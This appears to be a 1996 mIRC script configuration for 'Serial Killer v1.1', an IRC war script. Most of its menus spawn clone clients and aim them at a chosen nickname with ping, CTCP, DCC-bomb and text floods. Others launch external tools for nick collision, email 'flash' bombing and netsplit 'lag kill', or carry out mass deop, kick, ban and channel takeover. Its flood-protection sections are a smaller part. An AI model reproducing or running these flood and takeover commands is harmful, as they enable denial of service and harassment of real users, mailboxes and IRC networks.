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INI File | 1996-08-20 | 24.4 KB | 355 lines
[Aliases] alias0=/op /mode # +ooo $$1 $2 $3 alias1=/dop /mode # -ooo $$1 $2 $3 alias2=/j /join #$$1 alias3=/p /part # alias4=/n /names #$$1 alias5=/w /whois $$1 alias6=/k /kick # $$1 alias7=/q /query $$1 alias8=/hop /part # | /join #$$1 alias9=/send /dcc send $1 $2 alias10=/chat /dcc chat $1 alias11=/ping /ctcp $$1 ping alias12=count { alias13= echo 4 There are a total of $nick(0,#) people in this channel. [ $+ $opnick(0,#) OP'ed/ $+ $nopnick(0,#) Not OP'ed] alias14=} alias15=/ts ~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~||~|||~||~|||~|||~|||~|||~|||~|||~||~|~|~|~|~|~||||~|||~||~|~|~| [mPopup] mp0=Serial Killer v1.1: /notice # I am using Serial Killer v1.1 get at http://home.ptd.net/~golddust mp1=- mp2=Server mp3=.Lusers:/lusers mp4=.Motd:/motd mp5=.Time:/time mp6=Remote mp7=.ALL mp8=..ON :/enable #CTCPFP | /enable #echo | /enable #takeover | /enable #protection mp9=..OFF :/disable #CTCPFP | /disable #echo | /disable #takeover | /disable #protection mp10=.CTCP mp11=..ON :/enable #CTCPFP mp12=..OFF :/disable #CTCPFP mp13=.Echo mp14=..ON :/enable #echo mp15=..OFF :/disable #echo mp16=.Takeover Protection mp17=..ON :/enable #takeover mp18=..OFF :/disable #takeover mp19=.Event Protection mp20=..ON :/enable #protection mp21=..OFF :/disable #protection mp22=.Text Protection mp23=..ON :/enable #textflood mp24=..OFF :/disable #textflood mp25=.Action Protection mp26=..ON :/enable #actionflood mp27=..OFF :/disable #actionflood mp28=.Nick Protection mp29=..ON :/enable #nickflood mp30=..OFF :/disable #nickflood mp31=.Split Helper mp32=..ON :/enable #splithelper mp33=..OFF :/disable #splithelper mp34=Clones mp35=.Spawn mp36=..Spawn #1:/run c:\serial\mirc32.exe c:\serial\clones\clone1.ini mp37=..Spawn #2 :/run c:\serial\mirc32.exe c:\serial\clones\clone2.ini mp38=..Spawn #3 :/run c:\serial\mirc32.exe c:\serial\clones\clone3.ini mp39=..Spawn #4 :/run c:\serial\mirc32.exe c:\serial\clones\clone4.ini mp40=..Spawn #5 :/run c:\serial\mirc32.exe c:\serial\clones\clone5.ini mp41=..Spawn ALL :/run c:\serial\mirc32.exe c:\serial\clones\clone1.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone2.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone3.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone4.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone5.ini mp42=.Commands mp43=..Change Nick :/dde clone1 Command "" /nick $$?="nick:" | /dde Clone2 Command "" /nick $$?="enter Nick:" | /dde Clone3 Command "" /nick $$?="enter Nick:" | /dde Clone4 Command "" /nick$$?="enter nick:" | /dde Clone5 Command "" /nick $$?="enter Nick:" mp44=..Join Channel :/dde clone1 Command "" /join $$?="enter channel:" | /dde Clone2 command "" /join $! | /dde Clone3 Command "" /joiN $! | /dde Clone4 Command "" /joiN $! | /dde Clone5 Command "" /join $! mp45=..Leave Channel :/dde clone1 Command "" /leave | /dde Clone2 Command "" /leave | /dde Clone2 Command | /dde Clone3 Command "" /leave | /dde Clone4 Command "" /leave | /dde Clone5 Command " /leave mp46=..Kill Bots :/dde clone1 Command "" /quit Serial Killer v1.1 get at Http://home.ptd.net/~golddust | /dde Clone2 Command "" /quit Serial Killer http://home.pd.net/~golddust | /dde Clone3 Command "" /quit Serial Killer http://home.ptd.net/~golddust | /dde Clone4 Command "" /quit Serial Killer http://home.ptd.net/~golddust | /dde Clone5 Command "" /quit Serial Killer http://home.ptd.net/~golddust mp47=.Flooding mp48=..Ping Flood:/dde Clone1 command "" /pingflood $$?="Enter nickname to Ping Flood:" | /dde Clone2 command "" /pingflood $! | /dde Clone3 command "" /pingflood $! | /dde Clone4 command "" /pingflood $! | /dde Clone5 command "" /pingflood $! mp49=..DCC Bomb:/dde Clone1 command "" /dccbomb $$?="Enter nickname to DCC Bomb:" | /dde Clone2 command "" /dccbomb $! | /dde Clone3 command "" /dccbomb $! | /dde Clone4 command "" /dccbomb $! | /dde Clone5 command "" /dccbomb $! mp50=..Time Flood:/dde Clone1 command "" /timeflood $$?="Enter nickname to Time Flood:" | /dde Clone2 command "" /timeflood $! | /dde Clone3 command "" /timeflood $! | /dde Clone4 command "" /timeflood $! | /dde Clone5 command "" /timeflood $! mp51=..Echo Flood:/dde Clone1 command "" /echoflood $$?="Enter nickname to Echo Flood:" | /dde Clone2 command "" /echoflood $! | /dde Clone3 command "" /echoflood $! | /dde Clone4 command "" /echoflood $! | /dde Clone5 command "" /echoflood $! mp52=..Trout Flood:/dde Clone1 command "" /troutflood $$?="Enter nickname to Trout Flood:" | /dde Clone2 command "" /troutflood $! | /dde Clone3 command "" /troutflood $! | /dde Clone4 command "" /troutflood $! | /dde Clone5 command "" /troutflood $! mp53=..Finger Flood:/dde Clone1 command "" /fingerflood $$?="Enter nickname to Finger Flood:" | /dde Clone2 command "" /fingerflood $! | /dde Clone3 command "" /fingerflood $! | /dde Clone4 command "" /fingerflood $! | /dde Clone5 command "" /fingerflood $! mp54=..Halibut Flood:/dde Clone1 command "" /halibut $$?="Enter nickname to Halibut Flood:" | /dde Clone2 command "" /halibut $! | /dde Clone3 command "" /halibut $! | /dde Clone4 command "" /halibut $! | /dde Clone5 command "" /halibut $! mp55=..Version Flood:/dde Clone1 command "" /versionflood $$?="Enter nickname to Version Flood:" | /dde Clone2 command "" /versionflood $! | /dde Clone3 command "" /versionflood $! | /dde Clone4 command "" /versionflood $! | /dde Clone5 command "" /versionflood $! mp56=..UserInfo Flood:/dde Clone1 command "" /userinfo $$?="Enter nickname to UserInfo Flood:" | /dde Clone2 command "" /userinfo $! | /dde Clone3 command "" /userinfo $! | /dde Clone4 command "" /userinfo $! | /dde Clone5 command "" /userinfo $! mp57=..ClientInfo Flood:/dde Clone1 command "" /clientinfo $$?="Enter nickname to ClientInfo Flood:" | /dde Clone2 command "" /clientinfo $! | /dde Clone3 command "" /clientinfo $! | /dde Clone4 command "" /clientinfo $! | /dde Clone5 command "" /clientinfo $! mp58=..Tsunami Flood :/dde Clone1 Command "" | /ts | /dde Clone2 Command "" | /ts | /dde Clone3 Command "" | /ts | /dde Clone4 Command "" | /ts | /dde Clone5 Command "" | /ts mp59=Away mp60=.Set Away: { mp61= ame is away: $+ $$?="Enter your away message:" mp62= away $! mp63=} mp64=.Set Back: { mp65= ame is back! mp66= away mp67=} mp68=FlOODS mp69=.MCB mp70=..Collide:/run c:\serial\floods\mcb.exe -n $$?="Enter server to use:" $$?="Enter nick to collide:" mp71=..Multi Collide:/run c:\serial\floods\mcb.exe -m $$?="Enter server to use:" $$?="Enter nicks to collide:" mp72=.Flash mp73=..Basic:/run c:\serial\floods\flash.exe $$?="Enter e-mail address to flash:" 1 mp74=..Murder:/run c:\serial\floods\flash.exe $$?="Enter e-mail address to flash:" 3 mp75=..ZModem:/run c:\serial\floods\flash.exe $$?="Enter e-mail address to flash:" 2 mp76=.Sumo mp77=..LagKill:/run c:\serial\floods\sumo.exe -s $?="Enter WatchBot server:" -k $?="Enter initial kill server:" -n $?="Enter bot's nickname:" -r $?="Enter bot's real name:" -u $?="Enter bot's userid:" -c $?="Enter channel to lag kill:" -v -p $me $+ !*@* mp78=..Collide on Split:/run c:\serial\floods\sumo.exe -s $?="Enter WatchBot server:" -k $?="Enter initial kill server:" -n $?="Enter bot's nickname:" -r $?="Enter bot's real name:" -u $?="Enter bot's userid:" -c $?="Enter channel to lag kill:" -v -p $me $+ !*@* -m | /echo 3 Killing the specified channel on every split. mp79=List Channels :/list mp80=Edit Notes:/run notepad.exe notes.txt mp81=Quit IRC:/quit Leaving! [qPopup] qp0=Serial Killer v1.1:; qp1=- qp2=UCentral:/uwho $$1 qp3=Whois:/whois $$1 qp4=CTCP qp5=.Ping:/ctcp $$1 ping qp6=.Finger:/ctcp $$1 finger qp7=.Version:/ctcp $$1 version qp8=.Time:/ctcp $$1 time qp9=.Userinfo:/ctcp $$1 userinfo qp10=.ClientInfo:/ctcp $$1 clientinfo qp11=DCC qp12=.Send:/dcc send $$1 qp13=Floods qp14=.Nick Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 # 7 $$?="Enter server to use:" qp15=.Text Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 1 $?="Enter server to use:" qp16=.Finger Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 2 $?="Enter server to use:" qp17=.Ping Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 3 $?="Enter server to use:" qp18=.SED Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 4 $?="Enter server to use:" qp19=.BotKiller Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 5 $?="Enter server to use:" qp20=.Echo Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 6 $?="Enter server to use:" qp21=.Blitz Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 7 $?="Enter server to use:" qp22=.Version Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 8 $?="Enter server to use:" [lPopup] lp0=Serial Killer v1.1:; lp1=- lp2=Whois:/whois $$1 lp3=Query:/query $$1 lp4=UCentral:/uwho $1 lp5=- lp6=Control lp7=.Remote Lists lp8=..Auto-Op:/auto $$1 | /notice $$1 You have been added to my auto-op list. lp9=..Ignore:/ignore $$1 | /notice $$1 You have been added to my ignore list. lp10=..Echo:/guser 5 $$1 | /say Echoing $$1. lp11=..UnEcho:/ruser $$1 5 | /say No longer echoing $$1. lp12=..Shitlist :/guser 666 $$1 | /say Shitlisted lp13=..UnShitlist :/ruser 666 $$1 | /say unShitlisted lp14=.Bans lp15=..Level 1:/ban $$1 1 lp16=..Level 2:/ban $$1 2 lp17=..Level 3:/ban $$1 3 lp18=..Level 4:/ban $$1 4 lp19=..All!:/mode # +b *!*@* lp20=..Mass(12) lp21=...Level 1 :/ban $$1 1 | /ban $2 1 | /ban $3 1 | /ban $4 1 | /ban $5 1 | /ban $6 1 | /ban $7 1 | /ban $8 1 | /ban $9 1 | /ban $10 1 | /ban $11 1 | /ban $12 lp22=...Level 2 :/ban $$1 2 | /ban $2 2 | /ban $3 2 | /ban $4 2 | /ban $5 2 | /ban $6 2 | /ban $7 2 | /ban $8 2 | /ban $9 2 | /ban $10 2 | /ban $11 2 | /ban $12 lp23=...Level 3 :/ban $$1 3 | /ban $2 3 | /ban $3 3 | /ban $4 3 | /ban $5 3 | /ban $6 3 | /ban $7 3 | /ban $8 3 | /ban $9 3 | /ban $10 3 | /ban $11 3 | /ban $12 lp24=...Level 4 :/ban $$1 4 | /ban $2 4 | /ban $3 4 | /ban $4 4 | /ban $5 4 | /ban $6 4 | /ban $7 4 | /ban $8 4 | /ban $9 4 | /ban $10 4 | /ban $11 4 | /ban $12 lp25=.Notify :/notify $$1 | /notice $$1 You have been put on my Notify list lp26=.Tease Op:/mode # +o $$1 | /mode # -o $$1 lp27=.Tease DeOp:/mode # -o $$1 | /mode # +o $$1 lp28=.Give Ops:/mode # +ooo $$1 $2 $3 lp29=.Take Ops:/mode # -ooo $$1 $2 $3 lp30=.Voice:/mode # +vvv $$1 $2 $3 lp31=.DeVoice:/mode # -vvv $$1 $2 $3 lp32=.Kick User:/kick # $$1 lp33=.Kick/Ban:/ban $$1 2 | /kick # $$1 lp34=Mass Ctrl lp35=.Mass Op:/mode # +oooo $1 $2 $3 $4 | /mode # +oooo $5 $6 $7 $8 | /mode # +oooo $9 $10 $11 $12 | /mode # +oooo $13 $14 $15 $16 | /mode # +oooo $17 $18 $19 $20 | /mode # +oooo $21 $22 $23 $24 | /mode # +oooo $25 $26 $27 $28 | /mode # +oooo $29 $30 $31 $32 lp36=.Mass Ban:/ban $* 2 lp37=.Mass Msg:/msg $* $$?="Enter message:" lp38=.Mass Kick:/kick # $* KicK lp39=.Mass Invite:/invite $* $$?="Enter channel:" lp40=.Mass Voice:/mode # +vvvv $1 $2 $3 $4 | /mode # +vvvv $5 $6 $7 $8 | /mode # +vvvv $9 $10 $11 $12 | /mode # +vvvv $13 $14 $15 $16 | /mode # +vvvv $17 $18 $19 $20 | /mode # +vvvv $21 $22 $23 $24 | /mode # +vvvv $25 $26 $27 $28 | /mode # +vvvv $29 $30 $31 $32 lp41=.Mass DeOp:/mode # -oooo $1 $2 $3 $4 | /mode # -oooo $5 $6 $7 $8 | /mode # -oooo $9 $10 $11 $12 | /mode # -oooo $13 $14 $15 $16 | /mode # -oooo $17 $18 $19 $20 | /mode # -oooo $21 $22 $23 $24 | /mode # -oooo $25 $26 $27 $28 | /mode # -oooo $29 $30 $31 $32 lp42=.Mass Notice:/notice $* $$?="Enter notice:" lp43=.Mass DeVoice:/mode # -vvvv $1 $2 $3 $4 | /mode # -vvvv $5 $6 $7 $8 | /mode # -vvvv $9 $10 $11 $12 | /mode # -vvvv $13 $14 $15 $16 | /mode # -vvvv $17 $18 $19 $20 | /mode # -vvvv $21 $22 $23 $24 | /mode # -vvvv $25 $26 $27 $28 | /mode # -vvvv $29 $30 $31 $32 lp44=CTCP lp45=.Ping:/ctcp $$1 ping lp46=.Finger:/ctcp $$1 finger lp47=.Version:/ctcp $$1 version lp48=.Time:/ctcp $$1 time lp49=.Userinfo:/ctcp $$1 userinfo lp50=.ClientInfo:/ctcp $$1 clientinfo lp51=DCC lp52=.Send:/dcc send $$1 lp53=.Chat:/dcc chat $$1 lp54=.Fserv :/fserve $nick $$?="how many files at a time and the Dir too:" lp55=Floods lp56=.Nick Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 # 7 $$?="Enter server to use:" lp57=.Text Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 1 $?="Enter server to use:" lp58=.Finger Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 2 $?="Enter server to use:" lp59=.Ping Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 3 $?="Enter server to use:" lp60=.SED Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 4 $?="Enter server to use:" lp61=.BotKiller Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 5 $?="Enter server to use:" lp62=.Echo Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 6 $?="Enter server to use:" lp63=.Blitz Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 7 $?="Enter server to use:" lp64=.Version Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $1 8 $?="Enter server to use:" [bPopup] bp0=Serial Killer bp1=Set Away bp2=.On:/away $$?="Enter away message:" bp3=.Off:/away bp4=Remote bp5=.ALL bp6=..ON :/enable #CTCPFP | /enable #echo | /enable #takeover | /enable #protection bp7=..OFF :/disable #CTCPFP | /disable #echo | /disable #takeover | /disable #protection bp8=.CTCP bp9=..ON :/enable #CTCPFP bp10=..OFF :/disable #CTCPFP bp11=.Echo bp12=..ON :/enable #echo bp13=..OFF :/disable #echo bp14=.Takeover Protection bp15=..ON :/enable #takeover bp16=..OFF :/disable #takeover bp17=.Event Protection bp18=..ON :/enable #protection bp19=..OFF :/disable #protection bp20=.Text Protection bp21=..ON :/enable #textflood bp22=..OFF :/disable #textflood bp23=.Action Protection bp24=..ON :/enable #actionflood bp25=..OFF :/disable #actionflood bp26=.Nick Protection bp27=..ON :/enable #nickflood bp28=..OFF :/disable #nickflood bp29=.Split Helper bp30=..ON :/enable #splithelper bp31=..OFF :/disable #splithelper bp32=Clones bp33=.Spawn bp34=..Spawn #1:/run c:\serial\mirc32.exe c:\serial\clones\clone1.ini bp35=..Spawn #2 :/run c:\serial\mirc32.exe c:\serial\clones\clone2.ini bp36=..Spawn #3 :/run c:\serial\mirc32.exe c:\serial\clones\clone3.ini bp37=..Spawn #4 :/run c:\serial\mirc32.exe c:\serial\clones\clone4.ini bp38=..Spawn #5 :/run c:\serial\mirc32.exe c:\serial\clones\clone5.ini bp39=..Spawn ALL :/run c:\serial\mirc32.exe c:\serial\clones\clone1.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone2.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone3.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone4.ini | /run c:\serial\mirc32.exe c:\serial\clones\clone5.ini bp40=.Commands bp41=..Change Nick :/dde clone1 Command "" /nick $$?="nick:" | /dde Clone2 Command "" /nick $$?="enter Nick:" | /dde Clone3 Command "" /nick $$?="enter Nick:" | /dde Clone4 Command "" /nick$$?="enter nick:" | /dde Clone5 Command "" /nick $$?="enter Nick:" bp42=..Join Channel :/dde clone1 Command "" /join $$?="enter channel:" | /dde Clone2 command "" /join $! | /dde Clone3 Command "" /joiN $! | /dde Clone4 Command "" /joiN $! | /dde Clone5 Command "" /join $! bp43=..Leave Channel :/dde clone1 Command "" /leave | /dde Clone2 Command "" /leave | /dde Clone2 Command | /dde Clone3 Command "" /leave | /dde Clone4 Command "" /leave | /dde Clone5 Command " /leave bp44=..Kill Bots :/dde clone1 Command "" /quit Serial Killer v1.1 get at Http://home.ptd.net/~golddust | /dde Clone2 Command "" /quit Serial Killer http://home.pd.net/~golddust | /dde Clone3 Command "" /quit Serial Killer http://home.ptd.net/~golddust | /dde Clone4 Command "" /quit Serial Killer http://home.ptd.net/~golddust | /dde Clone5 Command "" /quit Serial Killer http://home.ptd.net/~golddust bp45=.Flooding bp46=..Ping Flood:/dde Clone1 command "" /pingflood $$?="Enter nickname to Ping Flood:" | /dde Clone2 command "" /pingflood $! | /dde Clone3 command "" /pingflood $! | /dde Clone4 command "" /pingflood $! | /dde Clone5 command "" /pingflood $! bp47=..DCC Bomb:/dde Clone1 command "" /dccbomb $$?="Enter nickname to DCC Bomb:" | /dde Clone2 command "" /dccbomb $! | /dde Clone3 command "" /dccbomb $! | /dde Clone4 command "" /dccbomb $! | /dde Clone5 command "" /dccbomb $! bp48=..Time Flood:/dde Clone1 command "" /timeflood $$?="Enter nickname to Time Flood:" | /dde Clone2 command "" /timeflood $! | /dde Clone3 command "" /timeflood $! | /dde Clone4 command "" /timeflood $! | /dde Clone5 command "" /timeflood $! bp49=..Echo Flood:/dde Clone1 command "" /echoflood $$?="Enter nickname to Echo Flood:" | /dde Clone2 command "" /echoflood $! | /dde Clone3 command "" /echoflood $! | /dde Clone4 command "" /echoflood $! | /dde Clone5 command "" /echoflood $! bp50=..Trout Flood:/dde Clone1 command "" /troutflood $$?="Enter nickname to Trout Flood:" | /dde Clone2 command "" /troutflood $! | /dde Clone3 command "" /troutflood $! | /dde Clone4 command "" /troutflood $! | /dde Clone5 command "" /troutflood $! bp51=..Finger Flood:/dde Clone1 command "" /fingerflood $$?="Enter nickname to Finger Flood:" | /dde Clone2 command "" /fingerflood $! | /dde Clone3 command "" /fingerflood $! | /dde Clone4 command "" /fingerflood $! | /dde Clone5 command "" /fingerflood $! bp52=..Halibut Flood:/dde Clone1 command "" /halibut $$?="Enter nickname to Halibut Flood:" | /dde Clone2 command "" /halibut $! | /dde Clone3 command "" /halibut $! | /dde Clone4 command "" /halibut $! | /dde Clone5 command "" /halibut $! bp53=..Version Flood:/dde Clone1 command "" /versionflood $$?="Enter nickname to Version Flood:" | /dde Clone2 command "" /versionflood $! | /dde Clone3 command "" /versionflood $! | /dde Clone4 command "" /versionflood $! | /dde Clone5 command "" /versionflood $! bp54=..UserInfo Flood:/dde Clone1 command "" /userinfo $$?="Enter nickname to UserInfo Flood:" | /dde Clone2 command "" /userinfo $! | /dde Clone3 command "" /userinfo $! | /dde Clone4 command "" /userinfo $! | /dde Clone5 command "" /userinfo $! bp55=..ClientInfo Flood:/dde Clone1 command "" /clientinfo $$?="Enter nickname to ClientInfo Flood:" | /dde Clone2 command "" /clientinfo $! | /dde Clone3 command "" /clientinfo $! | /dde Clone4 command "" /clientinfo $! | /dde Clone5 command "" /clientinfo $! bp56=..Tsunami Flood :/dde Clone1 Command "" | /ts | /dde Clone2 Command "" | /ts | /dde Clone3 Command "" | /ts | /dde Clone4 Command "" | /ts | /dde Clone5 Command "" | /ts bp57=Floods bp58=.Nick Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 # 7 $$?="Enter server to use:" bp59=.Text Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 1 $?="Enter server to use:" bp60=.Finger Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 2 $?="Enter server to use:" bp61=.Ping Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 3 $?="Enter server to use:" bp62=.SED Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 4 $?="Enter server to use:" bp63=.BotKiller Flood:/run c:\serial floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 5 $?="Enter server to use:" bp64=.Echo Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 6 $?="Enter server to use:" bp65=.Blitz Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 7 $?="Enter server to use:" bp66=.Version Flood:/run c:\serial\floods\Fb.exe $$?="Enter number of clones:" 1 $$?="nick:" 8 $?="Enter server to use:" bp67=Quit IRC:/quit Serial Killer v1.0 Shut Down! [Variables] v0=%i 0 v1=%nicks "" v2=%flood 0 v3=%shutupmsg What the Hell is your Problem you are shitlisted You are gone! [Commands] c0=#CTCPFP start c1=1:PING:/notice $nick You have been placed on ignore for 10 seconds due to CTCP PING. | /timer1 1 1 /ignore -t $nick 2 | /timer2 1 10 /ignore -r $nick 2 c2=1:ECHO:/notice $nick You have been placed on ignore for 10 seconds due to CTCP ECHO. | /timer3 1 1 /ignore -t $nick 2 | /timer4 1 10 /ignore -r $nick 2 c3=1:VERSION:/notice $nick You have been placed on ignore for 10 seconds due to CTCP VERSION. | /timer5 1 1 /ignore -t $nick 2 | /timer6 1 10 /ignore -r $nick 2 c4=1:SED:/notice $nick You have been placed on ignore for 10 seconds due to CTCP SED. | /timer7 1 1 /ignore -t $nick 2 | /timer8 1 10 /ignore -r $nick 2 c5=1:FINGER:/notice $nick You have been placed on ignore for 10 seconds due to CTCP FINGER. | /timer9 1 1 /ignore -t $nick 2 | /timer10 1 10 /ignore -r $nick 2 c6=1:VER:/notice $nick You have been placed on ignore for 10 seconds due to CTCP VER. | /timer11 1 1 /ignore -t $nick 2 | /timer12 1 10 /ignore -r $nick 2 c7=1:HALIBUT:/notice $nick You have been placed on ignore for 10 seconds due to CTCP HALIBUT. | /timer13 1 1 /ignore -t $nick 2 | /timer14 1 10 /ignore -r $nick 2 c8=1:TROUT:/notice $nick You have been placed on ignore for 10 seconds due to CTCP TROUT. | /timer15 1 1 /ignore -t $nick 2 | /timer16 1 10 /ignore -r $nick 2 c9=1:CLIENTINFO:/notice $nick You have been placed on ignore for 10 seconds due to CTCP CLIENTINFO. | /timer17 1 1 /ignore -t $nick 2 | /timer18 1 10 /ignore -r $nick 2 c10=1:USERINFO:/notice $nick You have been placed on ignore for 10 seconds due to CTCP USERINFO. | /timer19 1 1 /ignore -t $nick 2 | /timer20 1 10 /ignore -r $nick 2 c11=1:DCC SEND:/notice $nick You have been placed on ignore for 10 seconds due to DCC SEND. | /timer21 1 1 /ignore -t $nick 2 | /timer22 1 10 /ignore -r $nick 2 c12=1:DCC CHAT:/notice $nick You have been placed on ignore for 10 seconds due to DCC CHAT. | /timer23 1 1 /ignore -t $nick 2 | /timer24 1 10 /ignore -r $nick 2 c13=1:DO:/notice $nick My backdoor is locked! Nice try! You are on Ignore for 10 Seconds due to Backdoor | /timer26 1 1 /ignore -t $nick 2 | /timer27 1 10 /ignore -r $nick 2 c14=#CTCPFP end [Events] e0=#Echo start e1=+5:ON TEXT:*:#:/msg $chan $parms e2=+5:ON ACTION:*:#:/describe $chan $parms e3=#Echo end e4=#takeover start e5=1:ON SERVEROP:#:/mode $chan -o $opnick e6=1:ON SERVERMODE:#:+nts-milkp e7=#takeover End e8=#shitlist Start e9=666:ON TEXT:*:#: { e10= kick $chan $nick %shutupmsg e11= ruser $nick e12=} e13=666:ON ACTION:*:#: { e14= kick $chan $nick %shutupmsg e15= ruser $nick e16=} e17=666:ON JOIN:#:/ignore $nick | /kick $nick | /ban $nick | /notice $nick You are Shitlisted! Not welcome here e18=666:ON PART:#:/ban $nick | /notice $chan He is A shitlisted Person! e19=666:ON NOTICE:#:/ban $nick | /kick $nick | /notice $nick You are Shitlisted! e20=#shitlist End e21=#protection start e22=#TextFlood disabled e23=*1!:ON TEXT:*:#:/auser 200 $nick | /timer51 1 3 /ruser $nick e24=*+200:ON TEXT:*:#:/auser 201 $nick | /timer51 1 3 /ruser $nick e25=*+201:ON TEXT:*:#:/auser 202 $nick | /timer51 1 3 /ruser $nick e26=*+202:ON TEXT:*:#:/auser 203 $nick | /timer51 1 3 /ruser $nick e27=*+203:ON TEXT:*:#:/auser 204 $nick | /timer51 1 3 /ruser $nick e28=*+204:ON TEXT:*:#:/ruser $nick | /kick $chan $nick Serial Killer Text Flood Detected! e29=#TextFlood end e30=; e31=#ActionFlood disabled e32=*1!:ON ACTION:*:#:/auser 200 $nick | /timer52 1 3 /ruser $nick e33=*+200:ON ACTION:*:#:/auser 201 $nick | /timer52 1 3 /ruser $nick e34=*+201:ON ACTION:*:#:/auser 202 $nick | /timer52 1 3 /ruser $nick e35=*+202:ON ACTION:*:#:/auser 203 $nick | /timer52 1 3 /ruser $nick e36=*+203:ON ACTION:*:#:/auser 204 $nick | /timer52 1 3 /ruser $nick e37=*+204:ON ACTION:*:#:/ruser $nick | /kick $chan $nick Serial Killer Action Flood Detected! e38=#ActionFlood end e39=; e40=#NickFlood disabled e41=*1!:ON NICK:/auser 200 $newnick | /timer53 1 4 /ruser $newnick e42=*+200:ON NICK:/ruser $nick | /auser 201 $newnick | /timer53 1 4 /ruser $newnick e43=*+201:ON NICK:/ruser $nick | /auser 202 $newnick | /timer53 1 4 /ruser $newnick e44=*+202:ON NICK:/ruser $nick | /kick $chan $newnick Serial Killer Nick Flood Detected! e45=#NickFlood end e46=#protection End e47=1:ON TEXT:~sendmail*:MSG:/write c:\serial\mail $+ $parm2 $+ .txt From: $nick MESSAGE: $parm3* e48=1:ON TEXT:~getmail:MSG:/dcc send $nick c:\serial\mail\ $+ $nick $+ .txt e49=1:ON TEXT:~erasemail:MSG:/write -c c:\serial\mail\ $+ $nick $+ .txt e50=1:ON TEXT:~mailhelp:MSG: { e51= msg $nick Mailer: e52= msg $nick To Send Mail: /msg $me ~sendmail [nick] [message] e53= msg $nick To Get Mail: /msg $me ~getmail e54= msg $me To Erase Mail: /msg $me ~erasemail e55= closemsg $nick e56=} e57=#splithelper start e58=1:ON QUIT:*: { e59= IF (irc. ISIN $parms) { e60= echo 4 *** Possible Split: $parms e61= } e62=} e63=#splithelper End [Raw] r0=;Raw Section for Serial Killer